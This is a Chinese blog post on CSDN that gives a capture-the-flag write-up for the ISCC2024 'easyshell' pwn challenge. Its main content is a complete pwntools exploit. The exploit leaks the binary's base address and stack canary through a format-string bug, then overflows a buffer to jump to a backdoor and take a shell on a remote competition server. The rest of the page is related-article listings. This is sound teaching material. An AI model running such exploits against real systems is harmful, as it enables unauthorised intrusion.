[ISCC2024]-PWN:easyshell解析(格式化字符串漏洞泄露程序基地址及canary)

已于 2024-06-09 16:29:01 修改
阅读量177 收藏
点赞数 3
分类专栏: PWN 文章标签: java 前端 服务器 网络安全 安全
于 2024-05-04 21:25:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79326813/article/details/138450710
版权

查看保护

查看ida

flagis那里有可利用的格式化字符串漏洞

完整exp:

from pwn import*
context(log_level='debug')
p=process('./easyshell')
p=remote('182.92.237.102',10011)

payload=b'flagis\x00%17$p'
p.sendlineafter(b'>>',payload)
p.recvuntil(b'0x')
main254=int(b'0x'+p.recv(12),16)
print("main+254="+hex(main254))
main_addr=main254-254
print("main="+hex(main_addr))
cbase=main_addr-0x1422
backdoor=cbase+0x1291
print("backdoor="+hex(backdoor))
puts_got=cbase+0x3F90
payload=b'flagis\x00%15$p'
p.sendlineafter(b'>>',payload)
p.recvuntil(b'0x')
canary=int(b'0x'+p.recv(16),16)
print(hex(canary))
payload=b'a'*0x38+p64(canary)+b'a'*8+p64(backdoor)
p.sendlineafter(b'>>',payload)
p.sendlineafter(b'>>',b'exit')

p.interactive()
#8

这里主要是清楚位移是多少就行了

clxhzg
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
iscc-cli:国际会议
05-09
iscc-cli-命令行工具 一个基于为数字媒体文件创建ISCC代码的命令行工具。目录背景国际标准内容规范是针对分散式内容标识的的提议。 ISCC代码是根据内容本身通过算法生成的,并提供了许多强大的功能,例如内容相似性...
ISCC-2015-Writeups:这是iscc 2015的文章
05-24
所以,今年又做了一次ISCC,却没有了去年的那种感觉。其实也还好吧,希望ISCC越来越好呗。 其实这份Writeup,去年就想过要写,然后JC先写了,就没写下去。 现在想着,还是留一份给学弟学妹们吧。 加油~~ ##目录...
[ISCC2024]-PWN:Your_program解析(64位格式化字符串漏洞格式化字符串漏洞修改got表)
2301_79326813的博客
05-20 130
查看保护查看ida这里有格式化字符串漏洞,但只允许我们输入32个字节,所以要多次利用修改。
[ISCC2024]-PWN:Flag解析(ret2libc,libcsearcher找libc)
2301_79326813的博客
05-06 159
查看保护查看ida这里的help.txt貌似要一次输入完整,所以没有考虑解出这个。
[ISCC2024]-PWN:chaos解析(堆块满足条件getshell
2301_79326813的博客
05-04 179
查看保护查看ida这里满足条件就可以getshell了,没什么知识点。
[ISCC2024]-PWN:miao解析(32位系统调用execve来getshell
2301_79326813的博客
05-21 176
查看保护查看ida这里有格式化字符串漏洞,而且程序遗留了很多可利用的汇编,而且程序给了/bin/sh字符串。所以考虑用系统调用。32位系统调用寄存器传参的顺序是ebx,ecx,edx等,eax用于存储系统调用号。我这里尝试用了orw,但没有成功。
ISCC2021-MISC部分题目.zip
08-07
ISCC2021-MISC部分题目.zip是一个与ISCC(International Symposium on Computer Science and Convergence,国际计算机科学与融合大会)相关的压缩包文件。这个压缩包可能包含了该会议的多份论文、研究报告或者竞赛...
windows-installer:Windows的Software Carpentry安装程序
05-15
软件木工Windows安装程序 尽可能少地模拟Windows上的* nix环境。 剧本: 安装并使其可从访问 安装并使其可从msysGit访问 安装并使其可从msysGit访问 创建一个~/nano.rc并带有指向语法高亮显示配置的链接 提供...
gui-demo:内容区块链桌面应用程序
02-05
内容区块链GUI原型v1.0.2 GUI在的概念证明。 内容区块链项目正在构建基础工具,使记者,出版商和媒体初创企业能够在开放的区块链经济中创建新的创新产品,服务和商业模式。 该软件允许您在计算机上运行完整内容的...
Elsaticsearch java基本操作
qq_62383709的博客
07-13 649
索引 基本操作 package com.orchids.elasticsearch.web.controller; import cn.hutool.core.collection.CollUtil; import cn.hutool.json.JSONUtil; import com.orchids.elasticsearch.web.po.User; import io.swagger.annotations.Api; import io.swagger.annotations.ApiOperatio
配置Java开发环境
Broken_x的博客
07-10 1610
Java开发环境配置
java集合工具类
药的博客
07-12 453
【代码】java集合工具类。
java版的上门家政系统和PHP版的上门家政有什么区别?
baina666的博客
07-12 566
综上所述,Java版和PHP版的上门家政系统各有优缺点,选择哪种语言主要取决于项目的具体需求、预算、开发团队的技术栈以及未来的扩展计划等因素。同时,由于Java生态系统的复杂性和多样性,也可能需要投入更多的时间和资源来学习和掌握相关的技术和工具。Java版:Java拥有庞大的生态系统和丰富的第三方库,这为家政系统的开发和扩展提供了强大的支持。Java版:由于Java的编译执行机制和高效的垃圾回收算法,Java版家政系统通常具有更高的运行效率和更好的性能表现,尤其是在处理高并发、大数据量等复杂场景时。
Java方法练习-双色球彩票系统
T1798218285的博客
07-11 305
红色球号码从1-33中选择;蓝色球号码从1-16中选择。投注号码由6个红色球号码和1个蓝色球号码组成。三等奖 5+1 / 5+0 3000。四等奖4+1 / 4+0 200。六等奖1+1 / 1+0 5。一等奖6+1 1000w。二等奖6+0 500w。五等奖3+1 / 2+1。
基于Java技术的校园台球厅人员与设备管理系统
heye0910032的博客
07-12 549
本文介绍了一个基于Java技术和SpringBoot框架开发的校园台球厅人员与设备管理系统。该系统利用MySQL数据库进行数据存储,实现了包括首页、个人中心、用户管理、会员账号管理、会员充值管理、球桌信息管理、会员预约管理、普通预约管理、留言反馈和系统管理等多功能集成。系统设计考虑了用户友好性和操作便捷性,旨在提高校园台球厅人员与设备管理的效率和质量。本文介绍了一个基于Java技术和SpringBoot框架开发的校园台球厅人员与设备管理系统。
Java 中有哪几种基本数据类型?请分别列出它们并简述每种数据类型的特点及其在内存中的占用空间?
最新发布
liangzai215的专栏
07-15 306
Java的世界里,数据是构建应用程序的基石。为了高效地处理这些数据,Java设计了一系列基础数据类型,它们直接映射到计算机硬件上,因此在性能和内存使用上更为高效。我们常说的Java八大基本数据类型,涵盖了整数、浮点数、字符和布尔值,下面我将一一介绍它们的特点以及在内存中的占用空间,并通过简单的代码实例来加深理解。
构建自动化的精粹:Gradle任务依赖性与执行顺序控制
liuxin33445566的博客
07-15 338
本文以"构建自动化的精粹:Gradle任务依赖性与执行顺序控制"为题,详细介绍了任务依赖性的重要性、基本配置、多个任务的依赖性、条件依赖性、错误处理、高级用法、多项目构建中的任务依赖性。随着Gradle的不断发展,我们可以预见到更多关于任务依赖性和构建自动化的高级特性的出现,这将进一步扩展Gradle的构建能力,满足更复杂的项目构建需求。任务依赖性定义了任务之间的执行关系,确保了在构建过程中,任务能够按照预期的顺序执行。任务是一个特殊的任务,它默认依赖于所有没有显式排除的任务。方法来指定任务的依赖性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值